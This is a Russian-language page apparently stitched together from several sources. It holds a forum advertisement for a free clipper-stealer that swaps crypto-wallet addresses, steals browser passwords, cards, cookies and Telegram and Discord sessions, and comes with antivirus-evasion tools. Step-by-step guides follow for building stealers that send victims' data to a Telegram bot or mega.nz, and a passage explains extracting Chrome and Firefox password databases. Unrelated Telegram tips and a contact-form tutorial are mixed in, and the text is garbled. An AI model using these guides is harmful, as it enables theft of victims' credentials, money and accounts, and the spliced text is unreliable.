Статус В этой теме нельзя размещать новые ответы.
SuperJewish
Местный
SuperJewish
Местный
ПОДДЕРЖИВАЕТ ХРОМ 80
Привет! Хочу представить Вам клипер и стиллер
Клипер (Clipper) — софт для подмены кошельков в буфера обмена пользователя
Стиллер (Stealer) — софт для кражи каких-либо данных с ПК пользователя (паролей, файлов и т.д)
• Софт может моментально подменять:
QIWI, Yandex Money, WMR, WMU, WME, WMZ, WMX, Bitcoin, Bitcoin Cash, Bitcoin Gold, Ethereum, Dash, Litecoin, ZCash, Monero, Bytecoin, Doge, Electronium, Neo,
Cardano, Lisk, Stratis, Waves, Qtum, VIA, Graft, Ripple (30 кошельков), Steam Trade Link
Список будет пополнятся по запросу клиента
• Софт стилит с ПК:
1. Пароли браузеров
2. Кредитные карты браузеров
3. Сбор более 30 холодных криптокошельков
4. Информацию о ПК и пользователе
5. Текстовые файлы с рабочего стола
6. Скрин рабочего стола
7. Steam файлы (ssfn и config)
НОВЫЙ NATIVE СТИЛЛЕР БЫСТРЫЙ ОТСТУК, ОТПРАВКА В ТЕЛЕГРАМ И В ПАНЕЛЬ
8. Cookie файлы браузеров в формате netscape
9. Автозаполнения полей браузеров
10. Telegram сессию
11. Discord сессию
12. FileZilla файлы
13. Exodus сессию
14. Steam Desktop Authenticator сессии
• Поддерживаемые браузеры:
Все шаблонные браузеры на Chromium (сохраняющие базы данных в папку пользователя), к примеру: Google Chrome, Opera, Chromium Browser, Vivaldi, Амиго и другое
Все шаблонные браузеры на Gecko (сохраняющие базы данных в папку пользователя), к примеру: Mozilla Firefox, Waterfоx, SeaMonkey, Pale Moon и другое
• Скрины логов:
Спойлер: Пример
Спойлер: Пример лога изнутри
• Ещё несколько деталей
1. Быстрая подмена буфера обмена
2. Работа на Windows XP — Windows 10 x32/x64
3. Скрытая автозагрузка через планировщик (если Windows XP — то через реестр)
4. Защита от повторного запуска
5. Низкое потребление ресурсов (~ 200 кб памяти и 0 CPU)
6. Работа без прав Администратора
7. Возможность крипта
8. Скрытие файла трояна в проводнике
9. Работа без зависимостей
10. Работа без каких-либо дополнительных скриптов
11. Для отправки файлов через Telegram Бота используется приватный прокси сервер, поэтому логи 100% доходят
12. В комплекте идёт утилита для изменения информации о файле, помогает избавиться от детекта антивирусами
13. В комплекте идет утилита-сортер для стиллера
15. Все обновления софта будут бесплатно приходить в ваш личный Telegram бот
Войдите или зарегистрируйтесь для просмотра ссылок.
В чём суть бесплатного софта?
Не будем лукавить и скажем прямо, в данном стиллере присутствует клиппер, в котором указаны наши кошельки. Таким способом мы получаем взаимовыгодный бартер 😉
Источник: bhf.gg
Делаем стиллер с привязкой к телеграм
Ладно присупим первое что надо зделать скачать VIisual Studio-https://visualstudio.microsoft.com/ru/ а дальше сам исходник—https://yadi.sk/d/y1N64s5wiRu0pQ
Дальше вам надо будет открыт файл https://Luck.exe.sln-через Visual Studio
![[IMG]](https://i.imgur.com/DX7hx6L.png)
После этого Развернуть файлы внутри Fixed withhou other downloads
И нажать на файл https://program.cs
![[IMG]](https://i.imgur.com/SFpqfAI.png)
B вы должны увидитеть такую картину
![[IMG]](https://i.imgur.com/cvgDY9c.png)
И нажать на Settins Stealer и увидеть это
![[IMG]](https://i.imgur.com/gkkr6Yy.png)
Дальше сюда вписываем токен своего бота которого можно создать в BotFather
и узнаём свой id переписки тут[email protected]_echo_bot (не помню как точно называеться)
и вписываем в нужные строчки—public static string Token = «TOKEN HERE» // здесь токен нашего бота
—public static string ID HERE» // здесь ваш личный айди
Посути всё дальше выбираем release а не debug
![[IMG]](https://i.imgur.com/spRcfbG.png)
Нажимаем на сборку и собрать решение
![[IMG]](https://i.imgur.com/pis4D7Q.png)
Всё у вас есть стиллер который отсылает отстук в ваш телеграм
Источник: dark2web.org
Как сделать стиллер с отправкой в телеграм
Ладно присупим первое что надо зделать скачать VIisual Studio-https://visualstudio.microsoft.com/ru/ а дальше сам исходник—https://yadi.sk/d/y1N64s5wiRu0pQ
Дальше вам надо будет открыт файл https://Luck.exe.sln-через Visual Studio
После этого Развернуть файлы внутри Fixed withhou other downloads
И нажать на файл https://program.cs
B вы должны увидитеть такую картину
И нажать на Settins Stealer и увидеть это
Дальше сюда вписываем токен своего бота которого можно создать в BotFather
и узнаём свой id переписки тут[email protected]_echo_bot (не помню как точно называеться)
и вписываем в нужные строчки—public static string Token = «TOKEN HERE» // здесь токен нашего бота
—public static string // здесь ваш личный айди
Посути всё дальше выбираем release а не debug
Нажимаем на сборку и собрать решение
Всё у вас есть стиллер который отсылает отстук в ваш телеграм
Сегодня мы рассмотрим, как собрать один из самых удачных, на мой взгляд, стиллеров — Echelon, который обладает возможностью отправки логов в телеграмм или в облако mega.nz.
В первой части мы рассмотрим версию с возможностью отправки логов в вашего бота в Telegram, во второй части с отправкой на mega.nz
Возможности
Кратко пройдусь по основному функционалу:
- Сбор данных из всевозможных браузеров (логины и пароли, cookie, данные автозаполнения, история, сохраненные банковские карты и т.д.)
- Сбор файлов сессии Telegram, Outlook, Steam, Discord, криптокошельков и т.д.
- Файл-граббер, с возможностью выбрать расширения файлов, которые нужно собрать.
- Сбор информации о компьютере
- Данные VPN аккаунтов
- После сбора всех данных стиллер самоудаляется и не оставляет следов
- Не вылезает никаких окон и т.д.
Настройка и сборка
Для работы на понадобится Visual Studio 2019, скачать вы её можете на официальном сайте. Устанавливаете, при установке выберите данные пункты:
Весит она немало, примерно 20 Гб поэтому на виртуалке у вас должно быть достаточно места.
Скачиваем архив с файлами стиллера и распаковываем. Запускаем Visual Studio (далее VS) и жмем открыть проект или решение
Переходим в папку с распакованными файлами и выбираем Echelon.sln
У вас откроется проект справа, разверните список и нажмите по Program.cs
У вас появится исходный код программы.
Теперь нужно придумать пароль для архивов с логами, которые вы будете получать. Также вы можете расширить список расширений файлов для сбора.
Выставляем конфигурацию Release и собираем всё в одно целое:
После завершения, вам покажут путь, где лежит ваш стиллер
По сути, это всё. Если кто-то хочет, может покопаться в коде программы и других файлах, там всё довольно понятно, тем более автор оставлял ко всему комментарии.
Небольшое замечание от автора
Конечно, такой вид стиллера с отправкой логов в телегу, довольно удобен, однако не очень надежен с точки зрения реверса. Более менее разбирающийся человек сможет реверснуть ваш стиллер и получить токен бота, куда идут логи, а затем просто получить к нему доступ. Фактически другой человек сможет получить доступ ко всем вашим логам в боте.
Ниже мы расскажем, как пользоваться новыми функциями мессенджера Telegram.
Как отправлять быстрые реакции в Telegram
Свайпом влево по панели с эмодзи-реакциями, вы можете просмотреть дополнительные.
Сразу после того, как вы коснётесь выбранного эмодзи, анимация с ним появится в чате. Когда ваш собеседник откроет чат, он увидит такую же анимацию с вашей реакцией.
Как создать QR-код на свой профиль в Telegram
Вы можете сгенерировать QR-код, просканировав который, другие пользователи смогут переходить на ваш профиль в Telegram. Кроме того, вы можете выбрать для кода оригинальное оформление.
Вы также можете создать код для перехода на группу, канал или бота, чтобы удобно делиться ими с друзьями.
- Перейдите в свой профиль и нажмите значок в верхнем левом углу экрана.
- Здесь вы можете выбрать оформление для своего QR-кода и сразу же им поделиться. Можно даже сохранить изображение с кодом на своё устройство.
Когда другой пользователь просканирует ваш код своим устройством, он сможет быстро перейти на ваш профиль в Telegram.
Как использовать интерактивные эмодзи в Telegram
Теперь в приложении доступны интерактивные версии следующих эмодзи: .
Отправьте один из этих эмодзи в личном чате и коснитесь его, чтобы активировать эффект эмодзи и для себя, и для собеседника.
Ты наверняка слышал о таком классе зловредных приложений, как стилеры. Их задача — вытащить из системы жертвы ценные данные, в первую очередь — пароли. В этой статье я расскажу, как именно они это делают, на примере извлечения паролей из браузеров Chrome и Firefox и покажу примеры кода на C++.
WARNING
Весь код в статье приводится исключительно в образовательных целях и для восстановления собственных утерянных паролей. Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.
Итак, браузеры, в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.
Что скажет антивирус?
Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.
Chrome
Начнем с Chrome. Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:
Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.
Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).
Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле browser_family , оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).
Если условие browser_family == 0 выполняется, то получаем базу паролей браузера на основе Chrome, если browser_family == 1 — Firefox. Идентификатор CHROME_DB_PATH указывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции SHGetFolderPath , передавая ей в качестве аргумента CSIDL значение CSIDL_LOCAL_APPDATA , которое означает:
Функция SHGetFolderPath устарела, и в Microsoft рекомендуют использовать вместо нее SHGetKnownFolderPath . Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:
После этого функция lstrcat совмещает результат работы SHGetFolderPath с идентификатором CHROME_DB_PATH .
База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.
Теперь подключаемся к базе командой sqlite3_open_v2 . Ее прототип:
Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение SQLITE_OK , в противном случае возвращается код ошибки.
Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.
Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией sqlite3_exec() .
Продолжение доступно только участникам
В новой записи я вам расскажу как создать форму обратной связи с отправкой письма в телеграмм. Для отправки письма мы будем использовать стандартные методы API от Telegram. Подробную информацию о методах вы можете посмотреть в официальной документации Telegram
1) Вам нужно авторизоваться в Telegram аккаунте
4) После отправки запроса , нужно указать имя бота (на английском языке)
5) После этого дублировать название бота, но только суффиксом _bot
7) Теперь нам нужно создать чат в который мы добавим нашего бота
Здесь вам нужно записать следующий фрагмент кода – id вашего бота. Эту информацию тоже нужно записать.
Вам нужен id со знаком минус.
Создаём форму
Для примера я создал самую простую форму из 3 полей и кнопки. В качестве обработчика использую файл sendTelegram.php
Для примера давайте создадим простую форму из 3 полей: имя, email, телефон.
Новый вариант кода
Вам также будет интересно
Готовая форма с отправкой информации через ajax в Telegram
Готовая форма с отправкой файла drag https://1svoimi-rukami.ru/sovety/kak-sdelat-stiller-s-otpravkoj-v-telegram.html» target=»_blank»]1svoimi-rukami.ru[/mask_link]